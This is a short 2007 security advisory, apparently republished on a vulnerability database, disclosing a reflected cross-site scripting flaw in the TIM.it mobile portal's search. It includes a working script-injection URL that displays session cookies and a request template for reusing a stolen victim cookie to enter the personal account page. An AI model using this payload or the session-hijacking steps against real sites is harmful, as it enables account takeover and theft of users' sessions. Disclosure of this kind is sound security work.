Lucene search
tim-xss.txt
TIM (Telecom Italia Mobile) web portal TIM.it is vulnerable to XSS attack in search function allowing theft of session cookies, access to victim's personal page, and injection of arbitrary script code
Show more
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
TIM (Telecom Italia Mobile) is a big italian phone company.
The web portal TIM.it is vulnerable to XSS attacks in search function (
http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do). An attacker can
steal cookie session and access with victim credential, inject html or
arbitary script code.
Cookie view/steal:
http://www.tim.it/ricerca/d/areaconsumer/ricercasito.do?query=%3Cscript%20%0a%0d%3Ealert(document.cookie)%3B%3C/script%3E&area=119%20Self%20Service
Access to Self Service personal page:
Get Request to: https://www.tim.it/119/cruscotto/descrizioneservizi/wp.do
Host: www.tim.it
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.4)
Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9
,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: insert cookie victim
- --
Gianni Amato
http://www.gianniamato.it/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org
iD8DBQFGlkGeTxmfm2InrN8RAqoFAJ9L2qIfw6h8/Jjo2RDh0MXinxWqdACeNwJe
fqj1R7QJhCl7cFGsPSiIwjs=
=nt8r
-----END PGP SIGNATURE-----
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo13 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4